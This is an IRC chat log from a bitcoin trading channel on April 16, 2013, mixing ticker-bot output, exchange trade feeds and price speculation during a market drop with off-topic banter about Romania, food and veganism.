10789.73 bitcoins offered at or under 90.0 USD, worth 939197.07045 USD in total. | Data vintage: 7.8740 seconds Apr 16 00:27:48 ;;bc,stats Apr 16 00:27:50 Current Blocks: 231525 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 314 blocks | Next Difficulty In About: 1 day, 20 hours, 4 minutes, and 12 seconds | Next Difficulty Estimate: 8928892.15082 | Estimated Percent Change: 16.36768 Apr 16 00:43:36 pop pop pop Apr 16 00:43:48 uh oh Apr 16 00:43:56 omg lol those sells Apr 16 00:44:09 cooldown imminent Apr 16 00:49:35 ;;ticker Apr 16 00:49:36 BTCUSD ticker | Best bid: 76.40000, Best ask: 76.48000, Bid-ask spread: 0.08000, Last trade: 76.48000, 24 hour volume: 202039.77755624, 24 hour low: 76.00000, 24 hour high: 102.00000, 24 hour vwap: 90.72171 Apr 16 00:49:41 wow Apr 16 00:51:05 [HAVELOCK] [KCIM] 1 @ 1.22 BTC [+] Apr 16 00:51:15 ;;ticker Apr 16 00:51:16 BTCUSD ticker | Best bid: 78.00000, Best ask: 78.75000, Bid-ask spread: 0.75000, Last trade: 78.75000, 24 hour volume: 202039.77755624, 24 hour low: 76.00000, 24 hour high: 102.00000, 24 hour vwap: 90.72171 Apr 16 00:52:27 ;;title https://www.youtube.com/watch?v=K2ku1A5Ox8U Apr 16 00:52:28 Blame it on MT.GOX - YouTube Apr 16 00:53:18 BTC bought: [tid:1366062491912230] 12.00000000 BTC at $76.10000 Apr 16 00:53:23 BTC sold: [tid:1366062708031449] 9.15686140 BTC at $79.00000 Apr 16 00:53:44 quick scalp :3c Apr 16 00:53:53 yeah Apr 16 00:54:04 with so much movements, easy to flip for a few USD Apr 16 00:58:58 ;;next Apr 16 00:58:58 expecting to test 93, then to test 98 if 93 breaks, then testing 100 and targetting 103-105 | updated by OneFixt at Apr 15 2013, 18:43 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 3 hours, 15 minutes, and 54 seconds ago Apr 16 00:59:27 lol Apr 16 01:00:05 all so unreal... since 9 April till today went travelling without access to my own mpex account, figured that won't be problem Apr 16 01:00:31 of course, mayhem ensues in exactly that time frame Apr 16 01:01:48 http://krautchan.net/files/1366062103001.jpg Apr 16 01:02:07 !bids 69.9 Apr 16 01:03:43 !bids 69.9 Apr 16 01:03:53 ;;ticker Apr 16 01:03:54 BTCUSD ticker | Best bid: 72.00000, Best ask: 72.90000, Bid-ask spread: 0.90000, Last trade: 72.90000, 24 hour volume: 215607.09679741, 24 hour low: 73.31000, 24 hour high: 102.00000, 24 hour vwap: 89.77153 Apr 16 01:03:55 ;;bids 69.9 Apr 16 01:03:55 There are currently 17121.238 bitcoins demanded at or over 69.9 USD, worth 1234402.44978 USD in total. | Data vintage: 47.0863 seconds Apr 16 01:04:34 oh shit Apr 16 01:04:52 ;;market sell 10000 Apr 16 01:04:52 A market order to sell 10000 bitcoins right now would net 732027.7637 USD and would take the last price down to 71.5100 USD, resulting in an average price of 73.2028 USD/BTC. | Data vintage: 103.7943 seconds Apr 16 01:04:53 looks like we're goign for 40 Apr 16 01:04:53 i use to pm gribble, it's confusing !bids work Apr 16 01:04:56 er, 50 Apr 16 01:06:25 yes 50 before 40 Apr 16 01:06:54 ;;goxlag Apr 16 01:06:56 MtGox lag is 1.852667 seconds. During this time, light travels 0.00371272392451 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 16 01:07:14 MtGox really fixed the lag good Apr 16 01:07:21 lol Apr 16 01:07:29 No more 300-30000 seconds of lag on panic buy/sell Apr 16 01:07:41 I ranges from 0-10 second Apr 16 01:11:00 satoshi kid's play with his wallet Apr 16 01:13:03 haha ;) Apr 16 01:19:13 ;;bids 0 Apr 16 01:19:15 There are currently 49577235 bitcoins demanded at or over 0.0 USD, worth 11076918.2758 USD in total. | Data vintage: 0.0122 seconds Apr 16 01:19:18 ;;asks 999999999 Apr 16 01:19:18 There are currently 163292.17 bitcoins offered at or under 999999999.0 USD, worth 3921203220.22 USD in total. | Data vintage: 2.6129 seconds Apr 16 01:20:01 ;;asks 100 Apr 16 01:20:01 There are currently 35249.319 bitcoins offered at or under 100.0 USD, worth 3244397.7273 USD in total. | Data vintage: 45.8733 seconds Apr 16 01:20:25 kiss 100 goodbye Apr 16 01:21:05 [HAVELOCK] [VTX] 17 @ 0.48399999 = 8.228 BTC [+] Apr 16 01:21:44 [MPEX] [S.MPOE] 3600 @ 0.00071199 = 2.5632 BTC [+] Apr 16 01:23:29 are there options for short? Apr 16 01:28:57 [BTCTC] [ASICMINER-PT] 5 @ 0.899 = 4.495 BTC [+] Apr 16 01:31:48 [BTCTC] [S.MPOE-PT] 200 @ 0.0006 = 0.12 BTC [-] Apr 16 01:35:21 !ticker m s.mpoe Apr 16 01:35:23 [MPEX:S.MPOE] 1D: 0.00067807 / 0.00069653 / 0.00071199 (321008 shares, 223.59 BTC), 7D: 0.00065356 / 0.00069955 / 0.000735 (2738441 shares, 1,915.70 BTC), 30D: 0.00059218 / 0.0006853 / 0.00077505 (9950306 shares, 6,818.95 BTC) Apr 16 01:36:38 nice little bounce here Apr 16 01:36:47 glad my friends will be able to get out above 80 Apr 16 01:41:13 [BTCTC] [ASICMINER-PT] 1 @ 0.895 BTC [-] Apr 16 01:41:15 [BTCTC] [ASICMINER-PT] 2 @ 0.89 = 1.78 BTC [-] Apr 16 01:43:23 [MPEX] [S.MPOE] 3213 @ 0.00071004 = 2.2814 BTC [-] Apr 16 01:45:18 [BTCTC] [ASICMINER-PT] 1 @ 0.87021 BTC [-] Apr 16 01:48:07 [MPEX] [S.MPOE] 3401 @ 0.00071004 = 2.4148 BTC [-] Apr 16 01:52:33 ;;ticker Apr 16 01:52:39 BTCUSD ticker | Best bid: 77.21200, Best ask: 77.21210, Bid-ask spread: 0.00010, Last trade: 77.21210, 24 hour volume: 235487.22898511, 24 hour low: 71.51000, 24 hour high: 102.00000, 24 hour vwap: 87.89123 Apr 16 01:53:42 [BTCTC] [ASICMINER-PT] 1 @ 0.8702 BTC [-] Apr 16 01:56:37 [BTCTC] [PAJKA.BOND] 1 @ 0.10179 BTC [+] Apr 16 01:59:36 [MPEX] [S.MPOE] 2000 @ 0.00071199 = 1.424 BTC [+] Apr 16 02:01:53 that remains to be seen Apr 16 02:08:05 [HAVELOCK] [KCIM] 1 @ 1.22 BTC [+] Apr 16 02:15:30 scraped another 42btc out of stocks and sold above 80 Apr 16 02:16:02 [BTCTC] [RSM] 5 @ 0.0016 = 0.008 BTC [-] Apr 16 02:16:19 [MPEX] [S.MPOE] 7251 @ 0.00070461 = 5.1091 BTC [-] Apr 16 02:16:44 got btctalk PM with disguised link to proxy to get my password Apr 16 02:17:06 wonder how many users will fall for it Apr 16 02:17:32 Hell I am always afraid I will fall for one Apr 16 02:18:04 I want to scrape BTC out of my stocks too Apr 16 02:18:32 why would you want to sell it now? Think its going much lower? Apr 16 02:18:35 Sell the bounces Apr 16 02:18:36 bounce back to 87 is pretty likely. 94 plausible. 100 unlikely. Apr 16 02:18:44 ;;ticker Apr 16 02:18:45 BTCUSD ticker | Best bid: 83.70000, Best ask: 83.71000, Bid-ask spread: 0.01000, Last trade: 83.71000, 24 hour volume: 228798.11579488, 24 hour low: 71.51000, 24 hour high: 102.00000, 24 hour vwap: 87.58152 Apr 16 02:18:52 ;;eightball bounce Apr 16 02:18:53 Yes! Apr 16 02:18:56 yay Apr 16 02:19:02 Bugpowder: you are supposed to be neural scientist Apr 16 02:19:22 not hedgefund man Apr 16 02:19:51 ;;seen smickles Apr 16 02:19:52 smickles was last seen in #bitcoin-assets 1 week, 4 days, 7 hours, 37 minutes, and 14 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 16 02:21:47 stringpuller, still getting goxed by smickles? Apr 16 02:22:06 getting smickled? Apr 16 02:22:53 most of the btc i got out was bonds i had with Deprived, he bought them back from me like a champ Apr 16 02:23:27 he is the only non bitcoin-assets guy with half a brain Apr 16 02:23:35 actually he is full brain Apr 16 02:24:00 smickles is like overwhelmed doing people's taxes for btc Apr 16 02:24:09 likely* Apr 16 02:24:37 Deprived has a bond? Apr 16 02:25:00 hehe i made him once-a-lifetime offer to license coinbr code for 90BTC Apr 16 02:25:04 he refused Apr 16 02:25:08 *shrugs* Apr 16 02:27:09 yes LTC ATF Apr 16 02:27:13 has bonds Apr 16 02:27:17 LTC ATF B1 Apr 16 02:27:26 denominated in btc Apr 16 02:29:40 ;;ticker Apr 16 02:29:40 BTCUSD ticker | Best bid: 79.10000, Best ask: 79.57928, Bid-ask spread: 0.47928, Last trade: 78.00000, 24 hour volume: 231528.75561906, 24 hour low: 71.51000, 24 hour high: 102.00000, 24 hour vwap: 87.45454 Apr 16 02:30:35 too many speculatrs :( Apr 16 02:33:29 do we get one more bounce up here? Apr 16 02:33:37 or back to tankage? Apr 16 02:33:46 ;;ticker Apr 16 02:33:46 BTCUSD ticker | Best bid: 80.63830, Best ask: 80.65190, Bid-ask spread: 0.01360, Last trade: 78.80000, 24 hour volume: 234374.31191872, 24 hour low: 71.51000, 24 hour high: 102.00000, 24 hour vwap: 87.29248 Apr 16 02:33:51 maybe Apr 16 02:34:06 nice to see a little volume coming back into the market... Apr 16 02:34:27 huge volume Apr 16 02:34:34 down from here I think Apr 16 02:34:50 Well my friends have another 600BTC on the way to gox Apr 16 02:34:53 we got our dead cat bounce already Apr 16 02:34:56 for dumpage Apr 16 02:35:30 i seriously think that volume figure is bogus Apr 16 02:35:51 why? Apr 16 02:35:59 scrat: why? Apr 16 02:36:07 There are serious bids and asks getting destroyed right now Apr 16 02:36:19 right Apr 16 02:36:35 this is actually the highest volume period ever, excluding the free 48 hour period Apr 16 02:36:55 yes, i noticed that too Apr 16 02:36:59 40,000 BTC / hr Apr 16 02:38:34 ;;next Apr 16 02:38:34 buy targets: 74, 68, 54 | upper target 85-88, reversal up if we stay above 85 | updated by OneFixt at Apr 15 2013, 22:54 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 44 minutes and 29 seconds ago Apr 16 02:39:19 ;;eightball $32 bitcoin? Apr 16 02:39:19 It shall be. Apr 16 02:39:33 i KNEW it Apr 16 02:40:36 bids are evapotaing... Apr 16 02:40:43 now OneFixt is talking some sense Apr 16 02:40:46 evaporating.. Apr 16 02:40:57 too bad he told you that AFTER it dumped Apr 16 02:40:59 [BTCTC] [COGNITIVE] 1 @ 0.13999 BTC [+] Apr 16 02:41:06 [BTCTC] [COGNITIVE] 15 @ 0.14 = 2.1 BTC [+] Apr 16 02:41:09 Bugpow: i stepped out for an hour =( Apr 16 02:41:30 ha! Apr 16 02:41:35 one hour in like 2 weeks Apr 16 02:41:36 and bam Apr 16 02:42:28 ;;bids 0 Apr 16 02:42:30 There are currently 49590076 bitcoins demanded at or over 0.0 USD, worth 11742910.623 USD in total. | Data vintage: 0.0078 seconds Apr 16 02:42:40 ;;asks 99999999999 Apr 16 02:42:41 There are currently 150494.7 bitcoins offered at or under 99999999999.0 USD, worth 125027833971.0 USD in total. | Data vintage: 10.6874 seconds Apr 16 02:42:48 coins for sale going down Apr 16 02:43:18 sell the bounce! Apr 16 02:44:05 man, a LOT of coin sloshing around... Apr 16 02:44:50 low lag is such a novelty... Apr 16 02:45:06 [HAVELOCK] [VTX] 1 @ 0.484 BTC [+] Apr 16 02:45:46 MONEY NEVER SLEEPS Apr 16 02:45:57 they must have upgraded their servers actually Apr 16 02:46:05 otherwise lagged out Apr 16 02:46:07 [BTCTC] [RSM] 6 @ 0.00159 = 0.0095 BTC [-] Apr 16 02:46:37 3day chart on bitcoinity tells the story in no uncertain terms... lower lows and lower highs... Apr 16 02:47:04 you could almost set your watch to it... Apr 16 02:47:37 they did upgrade their severs during the "cool down"... Apr 16 02:48:00 problem was that they came back up with "free" trading for 2 days which killed them... Apr 16 02:48:02 nice bidwall now Apr 16 02:48:23 very happy my friends are going to get out above 80 Apr 16 02:49:04 [HAVELOCK] [VTX] 4 @ 0.484 = 1.936 BTC [+] Apr 16 02:49:15 PSA - sell the bounce! Apr 16 02:54:35 CampBX got a new logo Apr 16 02:54:58 it's not bad but kinda outta place with the site design Apr 16 02:55:08 https://campbx.com/main.php Apr 16 03:03:43 ;;goxlag Apr 16 03:03:44 MtGox lag is 1.143437 seconds. During this time, light travels 0.00229143494544 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 16 03:04:52 [MPEX] [S.DICE] 1000 @ 0.00439999 = 4.4 BTC [+] Apr 16 03:05:15 ;;ticker Apr 16 03:05:15 BTCUSD ticker | Best bid: 83.47901, Best ask: 83.48000, Bid-ask spread: 0.00099, Last trade: 83.47900, 24 hour volume: 235906.16414531, 24 hour low: 71.51000, 24 hour high: 102.00000, 24 hour vwap: 87.05151 Apr 16 03:06:20 [MPEX] [S.MPOE] 3050 @ 0.00070866 = 2.1614 BTC [+] Apr 16 03:24:59 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18617 BTC [-] Apr 16 03:25:04 [BTCTC] [CRYPTO-TRADE] 3 @ 0.17 = 0.51 BTC [-] Apr 16 03:25:07 [BTCTC] [CRYPTO-TRADE] 1 @ 0.152 BTC [-] Apr 16 03:27:21 [MPEX] [S.MPOE] 347 @ 0.00070461 = 0.2445 BTC [-] Apr 16 03:27:23 [MPEX] [S.MPOE] 3498 @ 0.00069916 = 2.4457 BTC [-] Apr 16 03:27:24 [BTCTC] [BASIC-MINING] 2 @ 0.41 = 0.82 BTC [+] Apr 16 03:27:26 [MPEX] [S.MPOE] 9084 @ 0.0006988 = 6.3479 BTC [-] Apr 16 03:27:28 [MPEX] [S.MPOE] 6709 @ 0.00069835 = 4.6852 BTC [-] Apr 16 03:29:34 [BTCTC] [ASICMINER-PT] 1 @ 0.871 BTC [+] Apr 16 03:29:37 [BTCTC] [ASICMINER-PT] 1 @ 0.8707 BTC [-] Apr 16 03:29:39 [BTCTC] [ASICMINER-PT] 1 @ 0.87 BTC [-] Apr 16 03:30:00 [BTCTC] [ASICMINER-PT] 3 @ 0.86 = 2.58 BTC [-] Apr 16 03:31:03 [BTCTC] [ASICMINER-PT] 5 @ 0.83 = 4.15 BTC [-] Apr 16 03:31:12 [BTCTC] [ASICMINER-PT] 1 @ 0.8261 BTC [-] Apr 16 03:31:15 [BTCTC] [ASICMINER-PT] 1 @ 0.826 BTC [-] Apr 16 03:31:18 [BTCTC] [ASICMINER-PT] 1 @ 0.826 BTC [-] Apr 16 03:32:42 [BTCTC] [S.DICE-PT] 3 @ 0.00428 = 0.0128 BTC [+] Apr 16 03:36:50 [MPEX] [S.MPOE] 3091 @ 0.00069835 = 2.1586 BTC [-] Apr 16 03:36:52 [MPEX] [S.MPOE] 7259 @ 0.00069763 = 5.0641 BTC [-] Apr 16 04:03:49 [BTCTC] [BASIC-MINING] 6 @ 0.41 = 2.46 BTC [+] Apr 16 04:05:27 [BTCTC] [ASICMINER-PT] 1 @ 0.8709 BTC [+] Apr 16 04:08:33 [BTCTC] [BTC-BOND] 17 @ 0.01 = 0.17 BTC [+] Apr 16 04:15:31 [BTCTC] [PAJKA.BOND] 5 @ 0.10179 = 0.509 BTC [+] Apr 16 04:18:19 it is QUIET in here... are those crickets i hear? Apr 16 04:19:18 *tubleweed* Apr 16 04:19:26 tumble* Apr 16 04:19:28 stubbleweed lol Apr 16 04:21:13 i'll be back in a bit Apr 16 04:22:29 [BTCTC] [RSM] 10 @ 0.00159 = 0.0159 BTC [-] Apr 16 04:25:56 you know, I really wish all charting products offered logarithmic scales... especially for volatile assets... Apr 16 04:33:06 [HAVELOCK] [KCIM] 5 @ 1.22 = 6.1 BTC [+] Apr 16 04:34:05 [HAVELOCK] [KCIM] 4 @ 1.22 = 4.88 BTC [+] Apr 16 04:34:07 [HAVELOCK] [KCIM] 4 @ 1.22 = 4.88 BTC [+] Apr 16 04:34:08 [HAVELOCK] [KCIM] 3 @ 1.22 = 3.66 BTC [+] Apr 16 04:35:06 [HAVELOCK] [KCIM] 2 @ 1.19 = 2.38 BTC [-] Apr 16 04:41:15 ;;ticker Apr 16 04:41:15 BTCUSD ticker | Best bid: 73.20000, Best ask: 74.00000, Bid-ask spread: 0.80000, Last trade: 74.00000, 24 hour volume: 244430.28357478, 24 hour low: 71.51000, 24 hour high: 102.00000, 24 hour vwap: 86.06528 Apr 16 04:41:22 ;;bc,24hprc Apr 16 04:41:23 86.18 Apr 16 04:41:27 jurov: Apr 16 04:41:33 where is you Apr 16 04:42:49 [BTCTC] [ASICMINER-PT] 1 @ 0.88999 BTC [+] Apr 16 04:42:57 [BTCTC] [ASICMINER-PT] 6 @ 0.89 = 5.34 BTC [+] Apr 16 04:43:00 somebody's fixin to buy $14K of litecoins Apr 16 04:43:06 [HAVELOCK] [VTX] 2 @ 0.49 = 0.98 BTC [+] Apr 16 04:43:11 actually $15K Apr 16 04:43:29 ;;ticker Apr 16 04:43:29 BTCUSD ticker | Best bid: 74.43000, Best ask: 74.90000, Bid-ask spread: 0.47000, Last trade: 74.95000, 24 hour volume: 246451.24074112, 24 hour low: 71.51000, 24 hour high: 102.00000, 24 hour vwap: 85.94777 Apr 16 04:43:40 ;;next Apr 16 04:43:40 74-80 range | buy targets: 74, 68, 54 | resistance 85-88, upper target in case of breakout mid-90s - 100 | updated by OneFixt at Apr 16 2013, 1:06 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 37 minutes and 35 seconds ago Apr 16 04:44:02 that thing accurate? Apr 16 04:44:18 this is not investment or trading advice <<<<< what do you think? Apr 16 04:44:52 thats different than the tool being accurate Apr 16 04:45:02 it's not a tool a guy updates it Apr 16 04:45:04 every so often Apr 16 04:45:25 it was a simple question, didnt ask if it was good advice just if it was accurate or not Apr 16 04:45:35 chill Apr 16 04:46:41 It's like a weather forecast... Apr 16 04:47:04 ok cool i understand those pretty well..thanks- Apr 16 04:47:05 ;;bc,24hprc Apr 16 04:47:05 86.00 Apr 16 04:48:08 stop being such a meanie Apr 16 04:49:43 ;;seen smickles Apr 16 04:49:43 smickles was last seen in #bitcoin-assets 1 week, 4 days, 10 hours, 7 minutes, and 6 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 16 04:51:50 way to look, glad i heard that idea Apr 16 04:52:49 ? Apr 16 04:55:34 bitcoin atm isn't just for getting money out of your account, but also for transferring it to anyone else Apr 16 04:58:05 [HAVELOCK] [VTX] 6 @ 0.46 = 2.76 BTC [-] Apr 16 05:07:04 [HAVELOCK] [SDICE] 2 @ 0.36500018 = 0.73 BTC [-] Apr 16 05:08:05 [HAVELOCK] [KCIM] 4 @ 1.049 = 4.196 BTC [-] Apr 16 05:09:05 [HAVELOCK] [HIM] 1 @ 1.66110001 BTC [-] Apr 16 05:10:05 [HAVELOCK] [HIM] 4 @ 1.6611 = 6.6444 BTC [-] Apr 16 05:15:22 getting kinda frothy out there! Apr 16 05:17:33 whatcha mean? Apr 16 05:18:41 pick up in volume, large market orders order on both side... market trying to decide which way it wants to go... Apr 16 05:19:24 kinda like my kids splashing around in the bathtub... frothy... Apr 16 05:20:50 hehe Apr 16 05:21:01 nice time to play Apr 16 05:22:40 [MPEX] [S.MPOE] 13700 @ 0.00070213 = 9.6192 BTC [+] Apr 16 05:22:45 [MPEX] [S.MPOE] 500 @ 0.00071199 = 0.356 BTC [+] Apr 16 05:23:53 well the gold chart makes me feel better Apr 16 05:24:14 i guess another trait of slovenes Apr 16 05:24:24 should be added to definition of sloveny Apr 16 05:25:34 lol Apr 16 05:28:25 ok, so we're at 75... poll: were are we at 24 hours from now? Apr 16 05:28:32 65 Apr 16 05:28:51 thanks to you fine people i know a bit more than i did about Slovenia and how embarrased i was to confuse it with Somalia..especially geographically. Apr 16 05:29:12 krs1: lol Apr 16 05:29:24 thanks to our PM id rather be in somalia Apr 16 05:29:30 ahahaha somalia Apr 16 05:29:34 =( Apr 16 05:30:01 mircea_popescu: how's romania? Apr 16 05:30:12 Many Americans are ignorant about other countries, ours is so big many cant even name all of our states. Apr 16 05:30:12 sorta 50 miles east of somalia. Apr 16 05:31:02 mircea_popescu: it's sorta a non-popular country to see on IRC Apr 16 05:31:11 orly ? Apr 16 05:31:27 yeah Apr 16 05:31:28 in case you didn't know, the balkan mafia runs this channel Apr 16 05:31:42 I do know a few things about Romania. Apr 16 05:31:45 lol Apr 16 05:31:47 there;'s evenb a freenode romanian server what arte you talkin' about Apr 16 05:31:59 Any tourist destinations there for the Dracul interests? Apr 16 05:32:09 yeah I know there is, I VPN there too, i assumed it was because you don't have laws or something Apr 16 05:32:23 we just don't have american nazism. Apr 16 05:32:59 you mean romanians dont hate americans? Apr 16 05:33:14 [BTCTC] [ASICMINER-PT] 4 @ 0.89 = 3.56 BTC [+] Apr 16 05:33:18 i'm assuming romanians know more about americans than americans know about romanians Apr 16 05:33:49 romanians probly know more about americans than americans know about americans, we dumb Apr 16 05:34:24 well... they think they do at the very least. Apr 16 05:35:10 curiously, I have a trio of romanian developers who have worked for me for 8 years... sponsored 2 of them for h1b's... we joke about romanians in my offic all he time... in a nice way, of course... Apr 16 05:35:19 ask an american what they think of romania, the answer will probably be around the lines of "isn't that a place where gypsies and wizards roam around?" Apr 16 05:35:51 gypsies kinda all left for france. Apr 16 05:35:57 my only impression of romania is that video mp showed of dudes fucking with the kid who stole the bike Apr 16 05:35:59 joecool: u are probably right Apr 16 05:36:10 like some kinda eurpoean bronx Apr 16 05:36:12 transylvania - that's what americans know about romania Apr 16 05:36:14 mircea_popescu: i thought france was a muslim country now Apr 16 05:36:26 pgp was spot on Apr 16 05:36:26 no that's the uk. Apr 16 05:36:31 and the weather is always dreadful Apr 16 05:36:43 well... i'm from transylvania actually. Apr 16 05:36:51 i like dreadful weather Apr 16 05:37:01 rain Apr 16 05:37:04 [BTCTC] [ASICMINER-PT] 1 @ 0.89899 BTC [+] Apr 16 05:37:08 [BTCTC] [ASICMINER-PT] 3 @ 0.89899 = 2.697 BTC [+] Apr 16 05:37:15 mircea popescu: i bet you can pull some bitches too Apr 16 05:37:23 it's finally improving here in eu Apr 16 05:37:24 it's not dreadful. it's sort of like hm... virginia maybe. Apr 16 05:37:26 like a tow truck Apr 16 05:37:27 after 8 months of winter Apr 16 05:37:28 brr Apr 16 05:37:29 well would be worse, canada is mostly cold and snow Apr 16 05:37:41 virginia has distinctive weather? Apr 16 05:37:47 kinda my point. Apr 16 05:37:50 hehe Apr 16 05:37:52 mp: how much time did you spend abroad? did you live in the US? Apr 16 05:37:56 sure only 8 moths of winter, wasnt there like 14? Apr 16 05:38:21 lol joecool wizards and gypsies lol yep Apr 16 05:38:40 were you born in a vampire castle? Apr 16 05:38:46 I am not far from Miami, FL we have a lot of culture here Apr 16 05:39:05 culture = lotsa spaniards? Apr 16 05:39:18 Cubans mostly, but a big mix of everyone..and i mean everyone Apr 16 05:39:19 pgp yeah. Apr 16 05:39:31 [MPEX] [S.MPOE] 3874 @ 0.00069763 = 2.7026 BTC [-] Apr 16 05:39:33 [MPEX] [S.MPOE] 7826 @ 0.00069745 = 5.4582 BTC [-] Apr 16 05:39:40 what does "a lot of culture" mean ? Apr 16 05:39:47 timisoara kinda like NYC right now... http://www.weather.com/weather/today/Timisoara+ROXX0040:1:RO Apr 16 05:39:54 good question Apr 16 05:40:02 must mean he is not cuban Apr 16 05:40:04 [BTCTC] [ASICMINER-PT] 3 @ 0.899 = 2.697 BTC [+] Apr 16 05:40:11 kakobrekla, climate is different in your secluded village Apr 16 05:40:44 lol Apr 16 05:41:05 [HAVELOCK] [HIM] 1 @ 1.6611 BTC [-] Apr 16 05:41:07 [HAVELOCK] [HIM] 1 @ 1.661 BTC [-] Apr 16 05:41:08 everywhere has culture Apr 16 05:41:15 Umm..means, a good mix of food/dancing/special interest groups of nationalities/people you will meet on the streets who could be from anywhere really..but a lot of Cubans...a lot of folks from the Caribbean..but also people from many parts of the world. Apr 16 05:41:17 slovenia's really nice these days Apr 16 05:41:18 http://instagram.com/p/YIg9mfCFrl/# Apr 16 05:41:21 where i am, its nascar and pickup trucks Apr 16 05:41:23 took this today Apr 16 05:41:42 zokijevo morje lol Apr 16 05:41:50 oh shit - gox taking a crap Apr 16 05:41:53 I have studied with students from abroad, Egypt, Japan, everywhere. Apr 16 05:42:11 i fail to see how this is culture. Apr 16 05:42:22 culture mostly means written shit 500 years old or older. Apr 16 05:42:31 you mean a lot of ethno stuff ? Apr 16 05:42:57 It has to be written? I have learned much about food from Jamaicans, dance from Cubans, poetry from folks from the U.K.. Apr 16 05:43:09 Music from Brazil.. Apr 16 05:43:22 yes culture has to be written. else it's maybe civilisation Apr 16 05:43:26 if you mean buldings or whatnot. Apr 16 05:43:36 if it's neither then it's folklore. Apr 16 05:43:46 Ok I had the wrong definition of culture then.. Apr 16 05:43:55 The Cubans make delicious food. Apr 16 05:44:49 thuis is kinda the advantage of vbeing american/english Apr 16 05:44:55 comparatively everyone makes great food. Apr 16 05:45:01 lol Apr 16 05:45:03 even the canadians, if only marginally. Apr 16 05:45:12 Even the British? ;) Apr 16 05:45:12 nah poutine is nasty Apr 16 05:45:19 as is candaian bacon Apr 16 05:45:26 that shit's sweet Apr 16 05:45:30 bleh Apr 16 05:45:32 who ever heard of sweet meat ;/ Apr 16 05:45:38 english have worst cuisine - hands down Apr 16 05:45:42 thats real big here mircea popescu Apr 16 05:45:43 yep Apr 16 05:45:48 their breakfast Apr 16 05:46:06 yeah english food is pretty bad Apr 16 05:46:08 really big...took someone from Brazil to help me realize most of how we prepare meat here is sweat.. Apr 16 05:46:15 sucks. Apr 16 05:46:31 yeah, gets ...bleh Apr 16 05:46:47 i like spicy foods (any kind of spice, not just hot), Thai, Indian, portuguese Apr 16 05:47:00 errr, guys, i think we're gonna break 70 here.... Apr 16 05:47:01 KRS1: live without carbs for a couple months, will change entirely how you feel about sweet things Apr 16 05:47:01 never ate Indian food I like.. Apr 16 05:47:11 fuck the price, gimme some horse meat Apr 16 05:47:14 i love lamb tikka masala Apr 16 05:47:19 Carbs is the one thing I can't break away from..wish I could. Apr 16 05:47:21 I go mad. Apr 16 05:47:29 mmm, horse meat Apr 16 05:47:38 i'd die without carbs, vegan Apr 16 05:47:38 carbs are killing me.... Apr 16 05:47:38 eh it's like a drug, there's a withdrawal from it, but then it doesn't matter Apr 16 05:47:47 ^ Apr 16 05:47:49 i'll have to treat myself with a horse burger soon Apr 16 05:47:52 I need to try to get over that hump. Apr 16 05:48:00 ThickAsThieves: was it you that linked thugkitchen.com? Apr 16 05:48:08 never heard of it Apr 16 05:48:10 if not, good vegan food blog Apr 16 05:48:22 omg vegan srsly Apr 16 05:48:25 heh vegan = cancer Apr 16 05:48:25 thx! Apr 16 05:48:31 joecool: what? Apr 16 05:48:35 kakobrekla: read teh blog anywya Apr 16 05:48:36 kakobrekla must kidnap vegans, feed them slanina. Apr 16 05:48:38 KRS1: raises cancer risk Apr 16 05:48:42 no shit Apr 16 05:48:50 mircea_popescu crossed my mind before Apr 16 05:48:51 yes Apr 16 05:48:53 thats bullshit cmon Apr 16 05:49:00 wow...i gotta hit teh google on that one Apr 16 05:49:07 mircea_popescu, http://2.bp.blogspot.com/-fj3S53HuS6g/TuJ1RicnxkI/AAAAAAAAAOA/SmT71hseD78/s1600/Lamb+Tikka+Masala.jpg Apr 16 05:49:09 is this it? Apr 16 05:49:14 nomnomnom Apr 16 05:49:16 vegan = higher risk of cancer - recent study... Apr 16 05:49:23 sample image http://24.media.tumblr.com/5df3e6568fcd5f6c0f41b797a3b17c9c/tumblr_mjl3p5VkRK1r4qrdyo3_1280.jpg Apr 16 05:49:25 orkaa looks kinda shitty but maybe. Apr 16 05:49:25 pgp, urlpls Apr 16 05:49:27 bullshit study Apr 16 05:49:35 j/k Apr 16 05:49:37 ThickAsThieves: it's not, start reading this blog, plenty of studies linked http://high-fat-nutrition.blogspot.com/ Apr 16 05:49:44 look up proportion of meat eaten in a country compared to cancer levels Apr 16 05:49:56 70 gone Apr 16 05:50:23 i guess my crystal ball isn't broken afterall... Apr 16 05:50:42 also http://24.media.tumblr.com/193181a821cfcd98d3c7a65edd04c843/tumblr_mjl3p5VkRK1r4qrdyo4_1280.jpg Apr 16 05:50:59 dick cancer, lol Apr 16 05:51:06 i will say that for some reason lately ive had trouble with energy, vegan and 3 hrs sleep isnt working :/ Apr 16 05:51:14 just saw a guy on reddit had one Apr 16 05:51:22 probably your insulin levels going fucking mad Apr 16 05:51:33 riding that rollercoaster all day Apr 16 05:51:59 68 Apr 16 05:52:04 i have a slave used to be vegetarian. Apr 16 05:52:24 now she gets a little sausage erryday? Apr 16 05:52:31 lol Apr 16 05:52:35 ! awesome, romania has slavery still Apr 16 05:52:37 lol Apr 16 05:52:45 67 Apr 16 05:52:48 dub now she eats prosciutto Apr 16 05:52:50 and cooks beef. Apr 16 05:52:57 66 Apr 16 05:53:24 some biggish dumps yea Apr 16 05:53:32 ;;ticker Apr 16 05:53:32 BTCUSD ticker | Best bid: 66.10000, Best ask: 66.80000, Bid-ask spread: 0.70000, Last trade: 66.10000, 24 hour volume: 275365.83424234, 24 hour low: 66.55000, 24 hour high: 102.00000, 24 hour vwap: 84.22094 Apr 16 05:53:35 I had some proper prosciutto recently, almost couldnt take it Apr 16 05:53:42 and I'll eat anything Apr 16 05:53:49 ;;eightball Will being vegan kill me? Apr 16 05:53:49 Unlikely. Apr 16 05:53:53 jesus h christ... Apr 16 05:53:56 it's great, what. Apr 16 05:53:58 home 